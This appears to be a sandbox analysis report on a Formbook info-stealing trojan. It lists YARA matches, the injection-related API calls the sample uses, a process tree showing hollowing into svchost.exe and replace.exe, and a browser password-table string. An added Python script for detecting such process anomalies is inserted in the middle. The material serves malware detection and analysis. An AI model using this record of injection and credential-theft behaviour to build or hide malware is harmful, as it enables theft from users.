Source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_003BC473 NtClose | 2_2_003BC473
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272B60 NtClose,LdrInitializeThunk | 2_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk | 2_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk | 2_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk | 2_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03274340 NtSetContextThread | 2_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03274650 NtSuspendThread | 2_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BA0 NtEnumerateValueKey | 2_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272B80 NtQueryInformationFile | 2_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BE0 NtQueryValueKey | 2_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BF0 NtAllocateVirtualMemory | 2_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AB0 NtWaitForSingleObject | 2_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AF0 NtWriteFile | 2_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AD0 NtReadFile | 2_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F30 NtCreateSection | 2_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F60 NtCreateProcessEx | 2_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FA0 NtQuerySection | 2_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FB0 NtResumeThread | 2_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F90 NtProtectVirtualMemory | 2_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FE0 NtCreateFile | 2_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272E30 NtWriteVirtualMemory | 2_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272EA0 NtAdjustPrivilegesToken | 2_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272E80 NtReadVirtualMemory | 2_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272EE0 NtQueueApcThread | 2_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D30 NtUnmapViewOfSection | 2_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D00 NtSetInformationFile | 2_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D10 NtMapViewOfSection | 2_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DB0 NtEnumerateKey | 2_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DD0 NtDelayExecution | 2_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C00 NtQueryInformationProcess | 2_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C60 NtCreateKey | 2_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272CA0 NtQueryInformationToken | 2_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272CF0 NtOpenProcess | 2_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272CC0 NtQueryVirtualMemory | 2_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273010 NtOpenDirectoryObject | 2_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273090 NtSetValueKey | 2_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032739B0 NtGetContextThread | 2_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273D10 NtOpenProcessToken | 2_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273D70 NtOpenThread | 2_2_03273D70
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF4340 NtSetContextThread,LdrInitializeThunk | 4_2_03AF4340
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF4650 NtSuspendThread,LdrInitializeThunk | 4_2_03AF4650
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2BA0 NtEnumerateValueKey,LdrInitializeThunk | 4_2_03AF2BA0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2BE0 NtQueryValueKey,LdrInitializeThunk | 4_2_03AF2BE0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 4_2_03AF2BF0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2B60 NtClose,LdrInitializeThunk | 4_2_03AF2B60
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2AF0 NtWriteFile,LdrInitializeThunk | 4_2_03AF2AF0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2AD0 NtReadFile,LdrInitializeThunk | 4_2_03AF2AD0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2FB0 NtResumeThread,LdrInitializeThunk | 4_2_03AF2FB0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2FE0 NtCreateFile,LdrInitializeThunk | 4_2_03AF2FE0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2F30 NtCreateSection,LdrInitializeThunk | 4_2_03AF2F30
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2E80 NtReadVirtualMemory,LdrInitializeThunk | 4_2_03AF2E80
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2EE0 NtQueueApcThread,LdrInitializeThunk | 4_2_03AF2EE0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2DF0 NtQuerySystemInformation,LdrInitializeThunk | 4_2_03AF2DF0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2DD0 NtDelayExecution,LdrInitializeThunk | 4_2_03AF2DD0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2D30 NtUnmapViewOfSection,LdrInitializeThunk | 4_2_03AF2D30
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2D10 NtMapViewOfSection,LdrInitializeThunk | 4_2_03AF2D10
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2CA0 NtQueryInformationToken,LdrInitializeThunk | 4_2_03AF2CA0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2C60 NtCreateKey,LdrInitializeThunk | 4_2_03AF2C60
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2C70 NtFreeVirtualMemory,LdrInitializeThunk | 4_2_03AF2C70
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF35C0 NtCreateMutant,LdrInitializeThunk | 4_2_03AF35C0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF39B0 NtGetContextThread,LdrInitializeThunk | 4_2_03AF39B0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2B80 NtQueryInformationFile | 4_2_03AF2B80
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2AB0 NtWaitForSingleObject | 4_2_03AF2AB0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2FA0 NtQuerySection | 4_2_03AF2FA0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2F90 NtProtectVirtualMemory | 4_2_03AF2F90
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2F60 NtCreateProcessEx | 4_2_03AF2F60
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2EA0 NtAdjustPrivilegesToken | 4_2_03AF2EA0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2E30 NtWriteVirtualMemory | 4_2_03AF2E30
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2DB0 NtEnumerateKey | 4_2_03AF2DB0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2D00 NtSetInformationFile | 4_2_03AF2D00
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2CF0 NtOpenProcess | 4_2_03AF2CF0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2CC0 NtQueryVirtualMemory | 4_2_03AF2CC0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF2C00 NtQueryInformationProcess | 4_2_03AF2C00
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF3090 NtSetValueKey | 4_2_03AF3090
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF3010 NtOpenDirectoryObject | 4_2_03AF3010
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF3D10 NtOpenProcessToken | 4_2_03AF3D10
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03AF3D70 NtOpenThread | 4_2_03AF3D70
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03248F30 NtDeleteFile | 4_2_03248F30
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03248FD0 NtClose | 4_2_03248FD0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03248E40 NtReadFile | 4_2_03248E40
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03248CE0 NtCreateFile | 4_2_03248CE0
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_03249120 NtAllocateVirtualMemory | 4_2_03249120
            Source: C:\Windows\SysWOW64\replace.exe | Code function: 4_2_0387F97A NtSetContextThread | 4_2_0387F97A
            Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle | 0_2_00431BE8
            Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00446313
            Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState | 0_2_004333BE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0322B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03287E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 032BF290 appears 105 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 03B2EA12 appears 86 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 03AAB970 appears 280 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 03B07E54 appears 111 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 03B3F290 appears 105 times
            Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 03AF5130 appears 58 times
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: String function: 00445AE0 appears 65 times
            Source: PO2024033194.exe, 00000000.00000003.2156088061.00000000046F3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO2024033194.exe
            Source: PO2024033194.exe, 00000000.00000003.2156371265.000000000489D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO2024033194.exe
            Source: PO2024033194.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/13
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0044AF6C GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\PO2024033194.exe Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
            Source: C:\Users\user\Desktop\PO2024033194.exe File created: C:\Users\user\AppData\Local\Temp\Anglophile
            Source: C:\Users\user\Desktop\PO2024033194.exe Command line argument: #v 0_2_0040D6B0
            Source: PO2024033194.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO2024033194.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\PO2024033194.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: replace.exe, 00000004.00000002.4619808862.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2465032169.0000000003405000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.00000000033FA000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003429000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2462188877.00000000033FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO2024033194.exe ReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\PO2024033194.exe File read: C:\Users\user\Desktop\PO2024033194.exe
            Source: unknown Process created: C:\Users\user\Desktop\PO2024033194.exe "C:\Users\user\Desktop\PO2024033194.exe"
            Source: C:\Users\user\Desktop\PO2024033194.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2024033194.exe"
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
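The process tree above carries two indicators that are cheap to hunt for in endpoint telemetry: a SysWOW64 svchost.exe whose command line still names the dropper on the Desktop (the image on disk and argv[0] disagree, which is what a hollowed or spoofed process looks like in Sysmon Event ID 1 data), and System32/SysWOW64 binaries being started by parents outside C:\Windows (a Desktop executable and a randomly named Program Files binary). The script below is an added example, not part of the Joe Sandbox report or of any detection shipped with it; the event records are constructed here from the report's process tree plus one benign control, and the second heuristic is deliberately noisy and needs an allow-list before it is alertable.

```python
"""Two process-creation heuristics run over constructed Sysmon-style records.
The records are built from the report's process tree; they are not Sysmon exports."""
from dataclasses import dataclass
import ntpath


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the creating process ("unknown" if not captured)
    image: str          # full path of the created process
    command_line: str   # command line the created process was started with


def argv0(command_line: str) -> str:
    """Return the first token of a Windows command line, honouring double quotes."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(None, 1)[0] if s else ""


SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def findings(ev: ProcEvent) -> list:
    """Return the indicators raised by one event (empty list for a clean event)."""
    out = []
    image_name = ntpath.basename(ev.image).lower()
    argv0_name = ntpath.basename(argv0(ev.command_line)).lower()
    # 1. Image/argv[0] mismatch: the on-disk image is svchost.exe but the command
    #    line still names the dropper. Legitimate launches pass the real image.
    if argv0_name and image_name != argv0_name:
        out.append(f"image/cmdline mismatch: {ev.image} started as {argv0_name}")
    # 2. A System32/SysWOW64 binary spawned by a parent outside C:\Windows.
    #    Noisier than 1 (installers and admin scripts do this), so allow-list
    #    known parents before alerting on it.
    if ev.image.lower().startswith(SYSTEM_DIRS) and not ev.parent_image.lower().startswith("c:\\windows\\"):
        out.append(f"system binary {image_name} spawned by non-Windows parent {ev.parent_image}")
    return out


def scan(events) -> list:
    """Pair each event's image with its findings, keeping only events that raised one."""
    result = []
    for ev in events:
        hits = findings(ev)
        if hits:
            result.append((ev.image, hits))
    return result


# Constructed from the report's process tree; the explorer.exe -> cmd.exe record
# is a benign control that must not fire.
SAMPLE_EVENTS = [
    ProcEvent("unknown", r"C:\Users\user\Desktop\PO2024033194.exe",
              r'"C:\Users\user\Desktop\PO2024033194.exe"'),
    ProcEvent(r"C:\Users\user\Desktop\PO2024033194.exe", r"C:\Windows\SysWOW64\svchost.exe",
              r'"C:\Users\user\Desktop\PO2024033194.exe"'),
    ProcEvent(r"C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe",
              r"C:\Windows\SysWOW64\replace.exe", r'"C:\Windows\SysWOW64\replace.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\replace.exe", r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c whoami'),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        for hit in hits:
            print(f"{image}: {hit}")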
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\PO2024033194.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: ulib.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: wldp.dll
